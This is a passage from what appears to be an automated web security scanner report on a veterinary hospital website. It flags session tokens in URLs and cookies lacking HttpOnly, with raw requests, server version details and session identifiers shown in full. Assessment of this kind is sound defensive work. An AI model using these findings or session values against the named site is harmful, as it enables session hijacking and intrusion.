http://www.vcahospitals.com/main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A6830C2B-D8F4-43F2-B95E-78C277FCCFF2&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d8EFFB05E-C91A-43DB-BA1B-A7BB745D0BB7%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d040e6353a7ea37e6930856fe2e96ffd3%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=a7e84c5a5824b2f3bfa388c2289ad10b&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d61B79C48-C062-46F9-ABB6-C9F2C04EB7C7%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d577d155ccfdadada67e9689c8e906f7c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253d8EFFB05E-C91A-43DB-BA1B-A7BB745D0BB7%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253d040e6353a7ea37e6930856fe2e96ffd3%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A6830C2B-D8F4-43F2-B95E-78C277FCCFF2&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d8EFFB05E-C91A-43DB-BA1B-A7BB745D0BB7%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d040e6353a7ea37e6930856fe2e96ffd3%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=a7e84c5a5824b2f3bfa388c2289ad10b&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d61B79C48-C062-46F9-ABB6-C9F2C04EB7C7%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d577d155ccfdadada67e9689c8e906f7c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253d8EFFB05E-C91A-43DB-BA1B-A7BB745D0BB7%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253d040e6353a7ea37e6930856fe2e96ffd3%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:13:48 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=9fa7nr5r6l675dmq1d4gnmpmh2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...

4.5. http://www.vcahospitals.com/main/offer/thank-you.html previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/main/offer/thank-you.html

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=89CA6527-34F5-44F5-9FE6-1408D41DED87&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=0a9f236de16091436621ac3ecb3014ab&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC5E58271-0599-4DCE-A64E-4093BAC4AD11%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d3f9b848b2f0d1b6547ef64f5b4be7af5%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253d552C3BF2-B50A-4487-9212-B5A1CFEBF63B%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de47593670de12e47b4fa1e9df57adad6%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d79086EA1-6374-4E83-A33A-DCBB6D3E16CA%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253db15cfbc2e8b9d5050f6de59c6ed8b5b1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=

Request

POST /main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=89CA6527-34F5-44F5-9FE6-1408D41DED87&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=0a9f236de16091436621ac3ecb3014ab&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC5E58271-0599-4DCE-A64E-4093BAC4AD11%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d3f9b848b2f0d1b6547ef64f5b4be7af5%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253d552C3BF2-B50A-4487-9212-B5A1CFEBF63B%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de47593670de12e47b4fa1e9df57adad6%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d79086EA1-6374-4E83-A33A-DCBB6D3E16CA%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253db15cfbc2e8b9d5050f6de59c6ed8b5b1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com
Pragma: no-cache
Content-Length: 3685

fname=&lname=&addr=&city=&state=AZ&zip=&phone=&email=&optin=on&pettype=&other=&petname=&petage=&variant=&token=31c82c3543a452dc1200540d59f0157f&guid=0AD96EEC-57E3-4BB0-B188-1922AB63F2B0&referer=&uri=h
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:10:55 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=mu2hdob1gobie78vsadtqvdr76; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3161
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...

4.6. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=00dafb5b745078c195d9d4bb9a0d322c&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d989effced4fd802b60795345890a7d8f%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d32a72466f5237a34daf28231fdde613d%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%25253faltphone%25253d%252526ampm1%25253dAM%252526ampm2%25253dAM%252526ampm3%25253dAM%252526appt_type%25253dappt%252526client%25253dcurrent%252526date1%25253d%252526date2%25253d%252526date3%25253d%252526doctor%25253d%252526email%25253d%252526fname%25253d%252526guid%25253d%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526reason%25253d%252526referer%25253d%252526source%25253dnew-york-veterinary-hospital%252526submit%25253dRequest%25252bAn%25252bAppointment%252526time1%25253d%252526time2%25253d%252526time3%25253d%252526token%25253d69ad90c98185c3bfbf109c1ee7f2ceae%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fnew-york-veterinary-hospital%2525252fappt.html%2525253faltphone%2525253d%25252526ampm1%2525253dAM%25252526ampm2%2525253dAM%25252526ampm3%2525253dAM%25252526appt_type%2525253dappt%25252526client%2525253dcurrent%25252526date1%2525253d%25252526date2%2525253d%25252526date3%2525253d%25252526doctor%2525253d%25252526email%2525253d%25252526fname%2525253d%25252526guid%2525253d%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526reason%2525253d%25252526referer%2525253d%25252526source%2525253dnew-york-veterinary-hospital%25252526submit%2525253dRequest%2525252bAn%2525252bAppointment%25252526time1%2525253d%25252526time2%2525253d%25252526time3%2525253d%25252526token%2525253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fnew-york-veterinary-hospital%252525252fappt.html%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=00dafb5b745078c195d9d4bb9a0d322c&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d989effced4fd802b60795345890a7d8f%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d32a72466f5237a34daf28231fdde613d%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%25253faltphone%25253d%252526ampm1%25253dAM%252526ampm2%25253dAM%252526ampm3%25253dAM%252526appt_type%25253dappt%252526client%25253dcurrent%252526date1%25253d%252526date2%25253d%252526date3%25253d%252526doctor%25253d%252526email%25253d%252526fname%25253d%252526guid%25253d%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526reason%25253d%252526referer%25253d%252526source%25253dnew-york-veterinary-hospital%252526submit%25253dRequest%25252bAn%25252bAppointment%252526time1%25253d%252526time2%25253d%252526time3%25253d%252526token%25253d69ad90c98185c3bfbf109c1ee7f2ceae%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fnew-york-veterinary-hospital%2525252fappt.html%2525253faltphone%2525253d%25252526ampm1%2525253dAM%25252526ampm2%2525253dAM%25252526ampm3%2525253dAM%25252526appt_type%2525253dappt%25252526client%2525253dcurrent%25252526date1%2525253d%25252526date2%2525253d%25252526date3%2525253d%25252526doctor%2525253d%25252526email%2525253d%25252526fname%2525253d%25252526guid%2525253d%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526reason%2525253d%25252526referer%2525253d%25252526source%2525253dnew-york-veterinary-hospital%25252526submit%2525253dRequest%2525252bAn%2525252bAppointment%25252526time1%2525253d%25252526time2%2525253d%25252526time3%2525253d%25252526token%2525253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fnew-york-veterinary-hospital%252525252fappt.html%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)% HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

5. Cookie without HttpOnly flag set previous next
There are 6 instances of this issue:

/hanson/appt.html
/hanson/offer.html
/main/offer
/main/offer/
/main/offer/thank-you.html
/new-york-veterinary-hospital/appt.html

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

5.1. http://www.vcahospitals.com/hanson/appt.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/hanson/appt.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=v2putd7q3251oms7i32uuk9as6; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

5.2. http://www.vcahospitals.com/hanson/offer.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/hanson/offer.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=j1fqeocn1q0uhv2hk1geg4cm22; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
